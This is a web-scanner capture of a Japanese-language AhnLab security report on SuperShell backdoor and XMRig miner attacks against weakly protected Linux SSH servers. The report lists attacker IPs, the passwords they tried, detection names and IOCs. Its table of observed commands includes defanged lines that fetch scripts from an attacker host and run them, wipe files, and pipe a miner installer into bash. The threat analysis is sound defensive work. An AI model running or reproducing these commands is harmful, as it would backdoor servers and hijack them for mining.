urlscan.io logo urlscan.io
SecurityTrails logo

asec.ahnlab.com Open in urlscan Pro
192.0.78.197  Public Scan

Back to summary
URL: https://asec.ahnlab.com/jp/83164/
Submission: On October 30 via api from IN — Scanned from CA

Form analysis 1 forms found in the DOM

GET https://asec.ahnlab.com/jp/

<form method="get" class="searchform" action="https://asec.ahnlab.com/jp/">
  <input type="text" value="" name="s" class="searchfield" placeholder="Search...">
  <button class="searchsubmit"></button>
</form>

Text Content

 * マルウェアの情報
 * AhnLab 検知
 * 総計
 * 対応ガイド
 * AhnLab

Menuマルウェアの情報AhnLab 検知総計対応ガイドAhnLab
Posted By ATCP , 2024년 09월 19일


LINUX SSH サーバーを対象に拡散している SUPERSHELL マルウェア

AhnLab Security Emergency response Center (ASEC)では最近、管理が適切に行われていない Linux SSH
サーバーを対象にバックドアマルウェアである SuperShell をインストールする攻撃事例を確認した。SuperShell
は中国語を使用する開発者により製作されたもので、Go 言語で開発され Windows や Linux、Android
を含む様々なプラットフォームに対応している。実質的な機能はリバースシェルであり、攻撃者はこれを利用して感染システムを遠隔操作できる。

 

図1. Supershell の GitHub ページ

 

攻撃者は、複数のシステムを感染させたあと、スキャナーをインストールしたものと推定され、以下のような攻撃元から辞書攻撃によってログインを試みた。

Attacker IPID/PW209.141.60[.]249root / qwer179.61.253[.]67root / password
root / a123456789
root / a1234567
root / newroot
root / 123qaz!@#
root / Passw0rd
root / 123qweASD
root / abc123
root / daniel
root / 1qaz@wsx107.189.8[.]15root / doctor2.58.84[.]90root / Admin123!
root / 123456qwerty
root / cocacola
root / qweasd!@#

表1. 攻撃元のアドレスおよびログイン試行プロセスで使用した資格情報

 

攻撃に成功したあとは、以下のようなコマンドを実行して直接 SuperShell
をインストールするか、ダウンローダー機能を担うシェルスクリプトをインストールした。SuperShell は Web サーバーだけでなく、FTP
サーバーを通じてもダウンロードされた。

# cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r *
# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod
777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777
sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777
sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21
45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh
sensi2.sh sensi1.sh; rm -rf *
# cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget
hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r *
# cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh | sh ; wget
hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r *
# cd /tmp ; curl -s -L
hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh |
LC_ALL=en_US.UTF-8 bash -s
871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx
; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x
ssh1 ; ./ssh1 ; rm -r ssh1

表2. 攻撃事例で確認されたコマンド

 

最終的にインストールされたマルウェアは難読化されているが、少数の内部文字列と動作方式、そして実行プロセスで確認できる文字列を通じて、SuperShell
バックドアであることが確認できる。

 

図2. 難読化された SuperShell

 

図3. SuperShell の実行ログ

 

一般的に、管理が適切に行われていない Linux システムを対象とする攻撃では XMRig のようなコインマイナーや ShellBot、Tsunami のような
DDoS Bot がインストールされる傾向がある。今回確認された攻撃で、攻撃者は操作権限の奪取目的で、まず SuperShell をインストールした。もちろん
SuperShell と同時に XMRig モネロコインマイナーをインストールする事例が確認されていることからも、最終目的は仮想通貨の採掘であると見られる。

871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx

表3. 攻撃者のモネロウォレットアドレス

 

最近、管理が適切に行われていない Linux SSH サーバーを対象に、SuperShell バックドアがインストールされている。SuperShell
がインストールされると、Linux サーバーは攻撃者のコマンドを受け取り操作権限を奪われることがある。

 

そのため、管理者はアカウントのパスワードを推測が困難な形式で設定し、定期的にパスワードを変更することで、総当たり攻撃や辞書攻撃から Linux
サーバーを保護する必要があり、セキュリティパッチを最新にして脆弱性攻撃を防止するべきである。また、外部に公開されていてアクセスが可能なサーバーに関してはファイアウォールのようなセキュリティ製品を利用し、外部の攻撃者からのアクセスを統制しなければならない。最後に、V3
を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払う必要がある。

 

検知名
Backdoor/Linux.CobaltStrike.3753120 (2024.09.11.00)
Downloader/Shell.Agent.SC203780 (2024.09.11.00)
Downloader/Shell.ElfMiner.S1705 (2021.11.29.02)

 

IOC 関連情報

MD5

4ee4f1e7456bb2b3d13e93797b9efbd3

5ab6e938028e6e9766aa7574928eb062

e06a1ba2f45ba46b892bef017113af09

URL

http[:]//45[.]15[.]143[.]197/sensi[.]sh

http[:]//45[.]15[.]143[.]197/ssh1

http[:]//45[.]15[.]143[.]197/x64[.]bin

http[:]//45[.]15[.]143[.]197[:]10086/supershell/compile/download/ssh

http[:]//45[.]15[.]143[.]197[:]44581/ssh1

追加 IoC は ATIP で提供しています。

IP

107[.]189[.]8[.]15

179[.]61[.]253[.]67

2[.]58[.]84[.]90

209[.]141[.]60[.]249

45[.]15[.]143[.]197

追加 IoC は ATIP で提供しています。

 

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム 「AhnLab TIP」
サブスクリプションサービスを通して確認できる。

Categories: マルウェア, Public

Tagged as: backdoor, CoinMiner, SSH, SuperShell, XMRig

XMRig コインマイナーを配布する BMOF(Binary Managed Object File) (MDS 製品による検知)
GotoHTTP を悪用した、MS-SQL サーバーを対象とする攻撃事例



ARCHIVES

Archives Select Month October 2024 September 2024 August 2024 July 2024 June
2024 May 2024 April 2024 March 2024 February 2024 January 2024 December 2023
November 2023 October 2023 September 2023 August 2023 July 2023 June 2023 May
2023 April 2023 March 2023 February 2023 January 2023 December 2022 November
2022 October 2022 September 2022 August 2022 July 2022 June 2022 May 2022 April
2022 March 2022 February 2022 January 2022 December 2021 November 2021 October
2021 September 2021 August 2021 July 2021 June 2021 May 2021 April 2021 March
2021 February 2021 January 2021 December 2020 November 2020 September 2020
August 2020 July 2020 June 2020 May 2020 April 2020 March 2020 February 2020
December 2019 November 2019 October 2019 September 2019 August 2019 June 2019
May 2019 April 2019 March 2019 February 2019 January 2019 November 2018 August
2018 July 2018 April 2018 February 2018

 * Facebook
 * RSS Feed




FOOTER(JP)

〒108-0014 東京都港区芝4丁目13-2 田町フロントビル3階 | 個人情報保護方針
© AhnLab, Inc. All rights reserved.


FAMILY SITE

한국 (한국어)Global (English)日本 (日本語)